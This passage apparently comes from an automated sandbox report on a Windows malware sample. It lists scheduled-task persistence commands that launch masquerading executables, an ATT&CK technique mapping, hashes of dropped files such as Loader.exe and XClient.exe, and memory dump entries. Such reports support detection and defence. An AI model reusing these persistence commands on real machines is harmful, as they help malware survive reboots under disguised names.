schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\wscript.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\wscript.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\wscript.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 8 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:964

C:\Windows\system32\taskeng.exe
taskeng.exe {23E006F7-4D7F-4ED2-9589-9C89EE668B24} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
1⤵
PID:2372
- C:\Users\Admin\AppData\Roaming\svhost.exe
  C:\Users\Admin\AppData\Roaming\svhost.exe
  2⤵
  PID:2796
- C:\Users\Admin\AppData\Roaming\svhost.exe
  C:\Users\Admin\AppData\Roaming\svhost.exe
  2⤵
  PID:1728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AzSiKwgWjv.bat

Filesize
215B

MD5
6a06688310ae5a30aaf0404d005e0df1

SHA1
cb0bafc4ffd565c45cd9c7633585b3780a8d4b4b

SHA256
2b807c7d04b869de22a214b31de1573c923ad7d4ab4f3e981f51086bca7bf7f0

SHA512
c884531016149771d84304bbd7aea53be6550986874b9cc3a7b354ffc9298b219d1feb07d6864e938d3dd8c26afcceaa26005ed110e1240aa5d7919a12d09846

Download Submit
C:\Users\Admin\AppData\Local\Temp\Loader.exe

Filesize
139KB

MD5
8f77f8b13b914f358059e3f7b9ddab70

SHA1
d406a28486b4dd881c454e526e149b98c0ec8462

SHA256
c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6

SHA512
b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES97CD.tmp

Filesize
1KB

MD5
10623a32f52da47aa7b3e70ea7fc3001

SHA1
a4359b544f5ae19f5796bacdaa554e08a96b1d49

SHA256
44da5bd1c649ecea8dbd0bdfc8ff40fcc3a3c1614ef34bd7ec4d1ad9185cfbf2

SHA512
5b9e007429c0ce8daa009397c525613fc1f4764f38c57abfb835781a54493da7b2e6fe121f988ab46c8b682280356befb2a4dbf0052f1748a46f79a5feee4759

Download Submit
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

Filesize
231KB

MD5
ff8f5c2670894f74456e534b34d6a8fe

SHA1
e0b35ae06f68adf07e4616da8e91bb1f935e492a

SHA256
d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37

SHA512
a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

Download Submit
C:\Users\Admin\AppData\Local\Temp\WVyhARMVLbTxIDX

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
60KB

MD5
28ff989c1d462f567aabb9c5ba76456b

SHA1
24be926b14f64f6a9f5b8248d1618bae9a7fc0b2

SHA256
a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d

SHA512
2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

Download Submit
C:\Users\Admin\AppData\Local\Temp\sCA7NQXWJUGRIXk

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\sol.exe

Filesize
2.1MB

MD5
25daefc71be60b76cb49fc81424d768d

SHA1
48be475dd36b433d62d4f7fed9b4d81a90122dee

SHA256
1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a

SHA512
e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\yi7fwNJvWGrGyle\Display\Display.png

Filesize
372KB

MD5
ed690d45a1e14d761b73cd573832f82e

SHA1
21a784f4eb22ae56a1f3474e00cc0dcf41d7ab76

SHA256
79d106ca1c4727e2b2a23daf69bce4223e4bb42d58dd8a2a2ad4db33279fd8f4

SHA512
ff281ea44e31692c3bdd774bfd445077ced950b09663c79860c9a3903339a901bc128fed82d9e1ffa2bf88eefa03afafc0bc828cd09f002b94e81291c2996ab1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RQ9ZJZM5IEU5SIUEMV4G.temp

Filesize
7KB

MD5
32456e75d7ec47b4fa0d19d495373ca7

SHA1
31105ea346babd62fe1e83b3360592036f50ec99

SHA256
067ab6bd106051af01bfd15e829c89965e84abaaf5c65ccaf54a2b50886b5af5

SHA512
7ed227b7362549903095ca9f1d66503872e8fb5e54a803b011cd7150e02b5c7787cf562835fcf849c7f2ccc61f65bbd88288ecbce55cea4698ccf921808b4e72

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
C:\hostNet\bridgeblockportComBroker.exe

Filesize
1.8MB

MD5
8ccc428a5a6f6139dc191d332f3de08b

SHA1
ae550a8fb67deeb1350020aa3fe8b0339db6bc71

SHA256
801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749

SHA512
1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

Download Submit
C:\hostNet\rlqSVEj.vbe

Filesize
230B

MD5
92408a105526970fa12ef23225de61ae

SHA1
bf70e8e671c10bf85771b2b8dd4549766cf79582

SHA256
b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10

SHA512
56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

Download Submit
C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat

Filesize
83B

MD5
02d21af8c5d6e8e0240a01325bcc4154

SHA1
ce58641040b6fe35d465a8a6932c277c7ff37ee5

SHA256
31498b70dce38481c709a35f22dbab0bde2be880abe88d6c90b7a96bf9f070b7

SHA512
758201561db3058e8d6d18c9a838fd49aa612fe0ef544479cc5776e4618ee4e90245b41b1bdb90257298c27fb6ee2589a262f8143816fa091be88a1ca977f7e8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3bmj1ral\3bmj1ral.0.cs

Filesize
355B

MD5
e84ffe1b6408d1e43d2bb72bdc8eb726

SHA1
85a3d715048f82c06ffa0fa2827c752bd873d156

SHA256
63a1fa94e06321694fa838be2dbf6289df368ebe516bef1a015dacfda424ff00

SHA512
5829c7cfbcebaeeb664423a917361373a231d3c464aac59e1cf979e4ade57149c87d5f7ba6fc925c870826580ecd7d4658f5d0b5586035a6a1c396b4dfbe33ca

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3bmj1ral\3bmj1ral.cmdline

Filesize
235B

MD5
1af613b328c9a55c70f091d5d8c0863c

SHA1
3c2cea474d96fd8de6072ef01a3ffafa92334e5b

SHA256
a77a9e95b1abb34abed547206fd57a034c5c3c37ab31446b6b6a86a7e6527620

SHA512
82f1fa228758f591c15262b268854be3b9122d18da6fe2e668d26eeb8d86a74194118bab1f0a732a3064c81cde19df3678079eb0d57bfd93b28d0abd324dfe58

Download Submit
\??\c:\Windows\System32\CSC67B74F05EB6444C0B29EB1143C9BD7.TMP

Filesize
1KB

MD5
bfb5195b3f3a87a55924d32b25f58821

SHA1
20a15b7e5c1f8626a991b0018ecff1e0f9bbdd55

SHA256
27fc2b6d7eb6b901e442740584ea89682cf613798415d7f431174412a2c78241

SHA512
137ad28b8cc1d5a270c6f98fe129697c1a1d6828f8fbeb72a2f290e0242f547c9aeb97d28c818efe717aa6b7833cece46dd6ddd5d033d9d1f5ce442757d2ab3b

Download Submit
memory/1068-259-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/1068-258-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/1472-374-0x0000000001280000-0x00000000012C0000-memory.dmp

Filesize
256KB

Download
memory/1492-534-0x00000000000D0000-0x0000000000110000-memory.dmp

Filesize
256KB

Download
memory/1728-590-0x0000000000030000-0x0000000000046000-memory.dmp

Filesize
88KB

Download
memory/1752-539-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/1796-105-0x0000000001120000-0x0000000001160000-memory.dmp

Filesize
256KB

Download
memory/2060-614-0x00000000008D0000-0x0000000000910000-memory.dmp

Filesize
256KB

Download
memory/2108-10-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/2108-88-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/2108-106-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/2108-12-0x0000000001310000-0x000000000133A000-memory.dmp

Filesize
168KB

Download
memory/2476-216-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2476-217-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/2488-129-0x0000000000530000-0x0000000000538000-memory.dmp

Filesize
32KB

Download
memory/2488-121-0x0000000000AD0000-0x0000000000CAE000-memory.dmp

Filesize
1.9MB

Download
memory/2488-123-0x0000000000520000-0x000000000052E000-memory.dmp

Filesize
56KB

Download
memory/2488-125-0x0000000000550000-0x000000000056C000-memory.dmp

Filesize
112KB

Download
memory/2488-127-0x0000000000570000-0x0000000000588000-memory.dmp

Filesize
96KB

Download
memory/2488-131-0x0000000000540000-0x000000000054C000-memory.dmp

Filesize
48KB

Download
memory/2572-485-0x0000000000D70000-0x0000000000DB0000-memory.dmp

Filesize
256KB

Download
memory/2796-362-0x0000000000070000-0x0000000000086000-memory.dmp

Filesize
88KB

Download
memory/2852-291-0x00000000001E0000-0x0000000000220000-memory.dmp

Filesize
256KB

Download
memory/2904-495-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/2904-494-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2980-211-0x0000000002A90000-0x0000000002A98000-memory.dmp

Filesize
32KB

Download
memory/2980-210-0x000000001B430000-0x000000001B712000-memory.dmp

Filesize
2.9MB

Download
memory/3016-5-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/3016-0-0x000007FEF55D3000-0x000007FEF55D4000-memory.dmp

Filesize
4KB

Download
memory/3016-16-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

Filesize
9.9MB

Download
memory/3016-1-0x0000000000FA0000-0x0000000001186000-memory.dmp

Filesize
1.9MB

Download
memory/3028-96-0x0000000000B40000-0x0000000000B56000-memory.dmp

Filesize
88KB

Download